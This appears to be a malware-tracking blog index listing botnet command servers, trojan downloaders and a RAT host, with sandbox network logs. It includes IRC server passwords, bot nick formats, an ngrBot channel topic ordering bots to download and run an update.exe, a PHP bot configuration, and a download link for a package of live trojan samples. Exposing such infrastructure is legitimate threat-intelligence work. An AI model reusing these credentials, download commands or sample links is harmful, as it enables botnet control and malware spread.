worksextv.info 69.73.174.163 Outgoing connection to remote server: worksextv.info TCP port 6567 * Now talking in ##dev## * Topic is ” * Set by {XPCOL419329} on Mon Apr 04 21:19:04 There are 602 users and 829 invisible on 1 servers 3 unknown connection(s) 14 channels formed I have 1431 clients and 0 servers – Current LocalRead more...
server.actualizacionbancaria.com(botnet hosted in Russian Federation 2×4.ru Network
Remote Host Port Number 213.251.170.52 80 92.241.165.157 80 92.241.165.115 1863 PASS ngrBot NICK n{US|XPa}erlwgkj USER erlwgkj 0 0 :erlwgkj JOIN #start romeo PRIVMSG #start :[DNS]: Blocked 0 domain(s) – Redirected 32 domain(s) * Now talking in #start * Topic is ‘*mdns http://92.241.165.157/info *up http://92.241.165.157/update.exe 1BA1C9594D0F92FCDA7FB74E7882925B ‘ * Set by stringback on Wed Apr 06 08:06:25Read more...
40mb exe samples
again another package with trojan downloaders clickers porn trojans etc Download: http://5f5c754a.goneviral.com
178.162.244.175(botnet hosted in Germany Idealhosting Managed Servers)
Remote Host Port Number 178.162.244.175 6667 178.162.244.175 8053 178.162.244.176 80 212.174.70.101 80 46.45.138.126 80 46.45.138.139 80 82.151.139.103 80 82.151.139.109 80 MODE #oyun MODE #Sohbet MODE #MuhabbeT NICK mIRCTurK576609 USER mIRCTurk “” “Irc.mIRCTurkk.CoM” : e mIRC Www.mircturkk.Com NOTICE IRC : VERSION mIRC v6.03 Khaled Mardam-Bey JOIN #Radyo,#yarisma,#kelime,#Oyun,#Sohbet,#MuhabbeT MODE mIRCTurK576609 +i MODE #Radyo MODE #yarisma MODE #kelimeRead more...
l2u.biz(trojan downloader hosted in Germany Berlin Keyweb Ag Ip Network)
l2u.biz 87.118.99.89 Outgoing connection to remote server: l2u.biz TCP port 80 – HTTP Conversations: F87.118.99.89:80 – [l2u.biz] Request: GET /epilog/upd/opt.xml opt.xml: http://l2u.biz/epilog/upd/opt.xml http://l2u.biz/epilog/main.php http://l2u.biz/epilog/upd/patch.xml http://l2u.biz/epilog/upd/filenew.exe infos about hosting: http://whois.domaintools.com/87.118.99.89
hdpta2020.no-ip.info(porn trojan hosted in United States Woodstock Fdcservers.net)
hdpta2020.no-ip.info 67.159.63.102 exe file: http://bec01aaa.theseblogs.com
update.cygo.net(trojan clicker hosted in Korea, Republic Of Seoul Thrunet Co. Ltd)
update.cygo.net 211.110.16.132 Outgoing connection to remote server: update.cygo.net TCP port 80 Network Activity – DNS Queries: Name Query Type Query Result Successful Protocol partner.cygo.net DNS_TYPE_A 211.110.16.132 211.110.16.134 1 udp – HTTP Conversations: From ANUBIS:1033 to 211.110.16.134:80 – [update.cygo.net] Request: GET /csrssp.dll Response: 200 “OK” From ANUBIS:1034 to 211.110.16.132:80 – [partner.cygo.net] Request: POST /check.php Response: 200Read more...
biofaction.no-ip.biz(rat user from Miami United States Miami Beach Mia Adsl Cbb)
biofaction.no-ip.biz 74.233.196.245 Outgoing connection to remote server: biofaction.no-ip.biz TCP port 5150 exe file: http://7ae576c0.filesonthe.net infos about hecker: http://whois.domaintools.com/74.233.196.245
ramboflaco.com(botnet hosted in France Ovh Sas)
ramboflaco.com DNS_TYPE_A 94.23.13.163 YES udp 94.23.13.163:1063 Nick: n{FR|XPa}xwwjmuw Username: xwwjmuw Server Pass: ngrBot Joined Channel: #rootcrazy with Password rambomarica infos about hosting: http://whois.domaintools.com/94.23.13.163
irc.golput.org(linux bots hosted in Spain Albacete Isp)
around 400-500 linux bots inside var $config = array(“server”=>”irc.golput.org”, // ip/host da rede “port”=>”9191”, // porta da rede “pass”=>”jancuk”, // senha da rede “prefix”=>”ret”, // nick do bot “maxrand”=>”3”, // quantidade de numero no nick do bot “chan”=>”#dor”, // canal que os bots vao entrar “chan2″=>”#dor”, // canal aonde os bots v?o mandar as vulnsRead more...